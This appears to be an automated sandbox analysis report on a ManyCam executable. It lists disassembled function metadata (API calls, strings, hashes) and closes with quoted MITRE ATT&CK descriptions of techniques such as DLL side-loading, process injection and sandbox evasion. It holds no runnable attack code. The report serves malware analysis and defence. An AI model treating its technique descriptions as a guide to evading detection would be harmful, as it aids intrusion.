Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd

Similarity

API ID: _setjmp3memset
String ID: VUUU
API String ID: 847497011-2040033107
Opcode ID: e4441fe17ac87a9348d9567e74d779725232fa11da2fc543bcc51072b1b441e1
Instruction ID: 4ac568a0fc4f79bf454a0b7258f45c9fc1bcf5c7a1faa685159ed21c9cd0dc19
Opcode Fuzzy Hash: e4441fe17ac87a9348d9567e74d779725232fa11da2fc543bcc51072b1b441e1
Instruction Fuzzy Hash: 8461C571A04B048BDF24DB78E9A5BAEB7E1EF95301F1484BDE46A87242DB306844CF51

Function 00BD3CE0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 114COMMON

Download Yara Rule

APIs

Part of subcall function 00BCC870: GlobalAlloc.KERNEL32(00000000,00000000,00BCFB2A,00BD084E,?,?,?,00BD084E,?,?,00000000,?), ref: 00BCC877

_ftol.MSVCR80 ref: 00BD3DE5

Strings

No space to write RATIONAL array, xrefs: 00BD3D0B
"%s": Information lost writing value (%g) as (unsigned) RATIONAL, xrefs: 00BD3D7E

Memory Dump Source

Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd

Similarity

API ID: AllocGlobal_ftol
String ID: "%s": Information lost writing value (%g) as (unsigned) RATIONAL$No space to write RATIONAL array
API String ID: 2648542381-1820873451
Opcode ID: e9ca2ca5aeb3f6fd3a82fd4fcfcbae64d1234d622eedaa8121b6d74ccbe85267
Instruction ID: 510cada84a4520f2c8592f5428e91826e917f43d66dfb16b07491a7dbdaa7f02
Opcode Fuzzy Hash: e9ca2ca5aeb3f6fd3a82fd4fcfcbae64d1234d622eedaa8121b6d74ccbe85267
Instruction Fuzzy Hash: 6D31D5719003019BC710EF58E945A5BFBE5FB84750F0049AAFC9897392E770DA45CBA2

Function 00B9A1A0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 113fileCOMMON

Download Yara Rule

APIs

_setjmp3.MSVCR80 ref: 00B9A212
fopen.MSVCR80 ref: 00B9A22E

Strings

1.2.8, xrefs: 00B9A1BF

Memory Dump Source

Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd

Similarity

API ID: _setjmp3fopen
String ID: 1.2.8
API String ID: 3541577079-509886058
Opcode ID: adb9868799435315f0b00e3f04c826028b45790d1e71768f2576cac9f3d66289
Instruction ID: c1baca16db498710b24e39ce7469ebabd6686764df4fa5d66c8c72bc7c76c9ad
Opcode Fuzzy Hash: adb9868799435315f0b00e3f04c826028b45790d1e71768f2576cac9f3d66289
Instruction Fuzzy Hash: 4531A771A402045BDB14DFA98C82BFFF7F8EF89700F1444AEE959A7341D671A9018BE1

Function 0041E140 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 98COMMON

Download Yara Rule

APIs

Part of subcall function 00406640: GetDlgItem.USER32(?,00000000), ref: 00406651

Part of subcall function 0041A3B0: _DebugHeapAllocator.LIBCPMTD ref: 0041A415
Part of subcall function 0041A3B0: _DebugHeapAllocator.LIBCPMTD ref: 0041A437
Part of subcall function 0041A3B0: _DebugHeapAllocator.LIBCPMTD ref: 0041A455
Part of subcall function 0041A3B0: _DebugHeapAllocator.LIBCPMTD ref: 0041A47D
Part of subcall function 0041A3B0: ?Load@CxImage@@QAE_NPB_WK@Z.CXIMAGECRT(00000000,00000000,?,00000000,?,0053E990,?,?,?,?,?,\class.xml,?,?,?,data\images\), ref: 0041A530

Part of subcall function 0041DE10: ??_V@YAXPAX@Z.MSVCR80(0000001F,7EC02BB4,?,?,?,0000001F,00000001,CameraDlg\btn_properties,00000000,?,000003EB), ref: 0041DE55

Part of subcall function 0040DA40: MoveWindow.USER32(000001E2,-0000012B,000001E2,00000000,00000000,00000000,?,?,00408A2E,0000006D,0000002D,00000157,00000017,00000001,00000000,?), ref: 0040DA61

Part of subcall function 0041AA40: GetWindowLongW.USER32(?,7EC02BB4), ref: 0041AA51

Part of subcall function 0041E880: SetWindowLongW.USER32(7EC02BB4,00000001,7EC02BB4), ref: 0041E895

SetLayeredWindowAttributes.USER32(?,00000000,000000B2,00000002,000000EC,00000000,000000EC,0000000A,0000000A,0000002D,00000014,00000001,Apply the selection,button,00000000,7EC02BB4), ref: 0041E1F1

Part of subcall function 0041E8B0: MoveWindow.USER32(?,?,00000000,?,00000000,00000001,-00000003,?,0041E25F,?,00000001,?,?), ref: 0041E8E7

Part of subcall function 0041E370: GetSystemMetrics.USER32(0000004E), ref: 0041E37B
Part of subcall function 0041E370: GetSystemMetrics.USER32(0000004F), ref: 0041E386
Part of subcall function 0041E370: GetSystemMetrics.USER32(0000004C), ref: 0041E391
Part of subcall function 0041E370: GetSystemMetrics.USER32(0000004D), ref: 0041E3A2

Strings

Apply the selection, xrefs: 0041E19C
button, xrefs: 0041E18C

Memory Dump Source

Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd

Similarity

API ID: Window$AllocatorDebugHeapMetricsSystem$LongMove$AttributesImage@@ItemLayeredLoad@
String ID: Apply the selection$button
API String ID: 70508497-2603280126
Opcode ID: 325f42cf690be37cc5bd74bc9656fe42c8c439b5651ae68e07e9d9de847688b4
Instruction ID: 04a5c8e6f4919bc5989b0440a3589c8b02fa676512b2dbfed97fa3f5bca5e94e
Opcode Fuzzy Hash: 325f42cf690be37cc5bd74bc9656fe42c8c439b5651ae68e07e9d9de847688b4
Instruction Fuzzy Hash: 6D310B70A40208ABDB08EBA5DD92FADB775AF44718F10011EF502A72D2DB797941CB59

Function 0041EED0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000004), ref: 0041EEDD

Part of subcall function 0040DA70: SetWindowPos.USER32(000001E2,-0000012B,000001E2,00000000,00000000,00000000,0040880B,?,?,0040880B,00000000,00000000,00000000,000001E2,-0000012B), ref: 0040DA95

Part of subcall function 004065F0: GetParent.USER32(?), ref: 004065FD

Part of subcall function 00406670: GetParent.USER32 ref: 0040669A
Part of subcall function 00406670: GetWindowRect.USER32(?,?), ref: 004066C0
Part of subcall function 00406670: GetWindowLongW.USER32(00000000,000000F0), ref: 004066DD
Part of subcall function 00406670: SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0040670D

Part of subcall function 00406640: GetDlgItem.USER32(?,00000000), ref: 00406651

Part of subcall function 00408120: ??_V@YAXPAX@Z.MSVCR80(?,7EC02BB4,?,?,?,?,00000000,00000000,00000000,00000000,0040641C,00000000), ref: 0040815C
Part of subcall function 00408120: lstrlenW.KERNEL32(0040641C,?,?,00000000,00000000,00000000,00000000,0040641C,00000000), ref: 00408172

Part of subcall function 0040DA40: MoveWindow.USER32(000001E2,-0000012B,000001E2,00000000,00000000,00000000,?,?,00408A2E,0000006D,0000002D,00000157,00000017,00000001,00000000,?), ref: 0040DA61

MoveWindow.USER32(00000000,00000000,00000001,000000E7,0000005F,00000048,00000017,00000001,00000113,00000034,000000C6,00000017,00000001,http://www.manycam.com/codec,00000000,00000211), ref: 0041EF99

Strings

http://www.manycam.com/codec, xrefs: 0041EF48

Memory Dump Source

Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd

Similarity

API ID: Window$MoveParentSystem$InfoItemLongMetricsParametersRectlstrlen
String ID: http://www.manycam.com/codec
API String ID: 3918154117-1165702928
Opcode ID: 3c772632c4e0218f7060b3e77bd1fd24f4dad1a2c19bf84bf2807e60cca908d2
Instruction ID: 149f93423e983da9d283a3b54f422c1b69b7f72d1b3e7c1b80e5497dd6e0fc8b
Opcode Fuzzy Hash: 3c772632c4e0218f7060b3e77bd1fd24f4dad1a2c19bf84bf2807e60cca908d2
Instruction Fuzzy Hash: 5C110D70B802096BFB18E7A5CC67FBE7225AF44708F00042DB717BA2C2DAB96520865D

Function 004C4AC0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.MSVCR80(00000000,00533F58,?,?,?,?,?,?,004BCB55,?,00533F58,000000FF,00533F58,004B85D2,00000000,00000000), ref: 004C4AD1
_invalid_parameter_noinfo.MSVCR80(?,00000000,00533F58,?,?,?,?,?,?,004BCB55,?,00533F58,000000FF,00533F58,004B85D2,00000000), ref: 004C4AEE

Strings

X?S, xrefs: 004C4B3E, 004C4B6F, 004C4B4E, 004C4B64, 004C4B41, 004C4B51

Memory Dump Source

Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: X?S
API String ID: 3215553584-928156776
Opcode ID: 300afce18172fda367b1e5a93a3139029df3230341556c5fc4a0edfbb8e029cc
Instruction ID: 6e252d52473bf057cc5c9ab3544af976a75f27afc912d5b1b1ccf3972680467b
Opcode Fuzzy Hash: 300afce18172fda367b1e5a93a3139029df3230341556c5fc4a0edfbb8e029cc
Instruction Fuzzy Hash: 7B214178E00204EFCB44EFA5C6A0E6FBB75AF89315B14819EE4055B311D738EE41CBA8

Function 00490E90 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.MSVCR80(?,0049315F,?,00000000,?,?,0048D60B,000000FF,?,?,00499CB6,?,?,?,00531AE6,000000FF), ref: 00490EA1
_invalid_parameter_noinfo.MSVCR80(00000003,?,0049315F,?,00000000,?,?,0048D60B,000000FF,?,?,00499CB6,?,?,?,00531AE6), ref: 00490EBE

Strings

_1I, xrefs: 00490F0E, 00490F3F, 00490F1E, 00490F34, 00490F11, 00490F21

Memory Dump Source

Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: _1I
API String ID: 3215553584-1375489561
Opcode ID: f8a0f0cd8858169583a3bfb7bac23ac9426c047314b7327a1f008bdd9c0947f0
Instruction ID: 39ed61a2cd6add22cacd6874f090497504692926125bc87bb284fc13d1f3f6b2
Opcode Fuzzy Hash: f8a0f0cd8858169583a3bfb7bac23ac9426c047314b7327a1f008bdd9c0947f0
Instruction Fuzzy Hash: 12213E74A00204EFCF04EFA5C58086EBF76AF89315B1489AEE4459B305CB38EA41CBA4

Function 00BBA180 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 40COMMON

Download Yara Rule

APIs

_ftol.MSVCR80 ref: 00BBA1CE

Strings

Limiting gamma to 21474.83, xrefs: 00BBA1A3
Setting gamma=0, xrefs: 00BBA1EE

Memory Dump Source

Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd

Similarity

API ID: _ftol
String ID: Limiting gamma to 21474.83$Setting gamma=0
API String ID: 2545261903-3311646275
Opcode ID: 89ce5e07ace49c861ee515791233976caefc075f465c4e2cf9080b59b486ad6e
Instruction ID: 37371b3f0de86d166cb12df89032bb9bc4556c36e314253a322d46b8821d6196
Opcode Fuzzy Hash: 89ce5e07ace49c861ee515791233976caefc075f465c4e2cf9080b59b486ad6e
Instruction Fuzzy Hash: 1FF04470800B4697C3506F09FE016AAB7E4FF83F40F0108CAE4D832269EFB19855AA93

Function 004AE2E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.MSVCR80(?,?,004AE1A3,CJ,00000000,?,004AE043,?,?,00000000,000000FF,004AD900,00000000,?,?,000000FF), ref: 004AE2EF
_invalid_parameter_noinfo.MSVCR80(?,?,004AE1A3,CJ,00000000,?,004AE043,?,?,00000000,000000FF,004AD900,00000000,?,?,000000FF), ref: 004AE32B

Strings

CJ, xrefs: 004AE2F9, 004AE335, 004AE312

Memory Dump Source

Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: CJ
API String ID: 3215553584-1577928124
Opcode ID: 70cad1bad6b93677a8aa04d1a4551bdbb9f1c5421a9a58d61efe08efc66d9194
Instruction ID: 1e5a07180b79b9d77b03a7b872fd22e8548e40f80d8fa90e55785185c90aae0e
Opcode Fuzzy Hash: 70cad1bad6b93677a8aa04d1a4551bdbb9f1c5421a9a58d61efe08efc66d9194
Instruction Fuzzy Hash: A401D731600008DFCB08DF59D694A6EFBB6EF66301F258199E9069B355C734AE50DB88

Function 004E29E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.MSVCR80(?,?,004E1883,CN,000000FF,?,004E0A43,?,?,000000FF,?), ref: 004E29EF
_invalid_parameter_noinfo.MSVCR80(?,?,004E1883,CN,000000FF,?,004E0A43,?,?,000000FF,?), ref: 004E2A25

Strings

CN, xrefs: 004E29FF, 004E2A35, 004E2A15

Memory Dump Source

Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: CN
API String ID: 3215553584-3860229782
Opcode ID: 3ded8f196a3c02e06d8d6a8014f10332241c82d37bf5bc7cecde32a8ae69c9c0
Instruction ID: 055c263bba3631ac84532d8d275a506bca3ff744e03e32cc4505f628b268f32f
Opcode Fuzzy Hash: 3ded8f196a3c02e06d8d6a8014f10332241c82d37bf5bc7cecde32a8ae69c9c0
Instruction Fuzzy Hash: 6D110234A00049EFCB14DF45C280DADB7B6FB99305B25C299E8068B315DB31AF46DB84

Function 00412C20 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.MSVCR80(?,?,004129C3,C A,00000000,?,00412043,?,?,00000000,-0000012B,0040F9E0,00000000,?,?,-0000012B), ref: 00412C2F
_invalid_parameter_noinfo.MSVCR80(?,?,004129C3,C A,00000000,?,00412043,?,?,00000000,-0000012B,0040F9E0,00000000,?,?,-0000012B), ref: 00412C65

Strings

C A, xrefs: 00412C39, 00412C6F, 00412C4F

Memory Dump Source

Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: C A
API String ID: 3215553584-432193327
Opcode ID: dd3759dd0edff71de197c755aad0b75e312425a4acb4d65829b04bcd21f34736
Instruction ID: d50c8c72ee7c7c5e73367f5c550ec2d48e9c8be17f747839894a4a99daa275eb
Opcode Fuzzy Hash: dd3759dd0edff71de197c755aad0b75e312425a4acb4d65829b04bcd21f34736
Instruction Fuzzy Hash: 0E01E931600008DFCB08CF48D7D49ADFBB6EF69345B668199E5069B315D730EE90DB98

Function 00B9D6E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

exit.MSVCR80 ref: 00B9D6F6
fprintf.MSVCR80 ref: 00B9D729

Strings

%s, xrefs: 00B9D723

Memory Dump Source

Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd

Similarity

API ID: exitfprintf
String ID: %s
API String ID: 4243785698-620797490
Opcode ID: fd9c6deb79413dfe1ad62202f921903fad40581ddfb75f7c5f3d252542e5ceab
Instruction ID: 4747bd8bf3161ecfdfd19d01b1040ceb503386d2748ece7f77148f724db0457d
Opcode Fuzzy Hash: fd9c6deb79413dfe1ad62202f921903fad40581ddfb75f7c5f3d252542e5ceab
Instruction Fuzzy Hash: 8EF0A735401211AFD300EF64DC48E9AB7F8EF89301F008459F485A3261EB75D805CB56

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

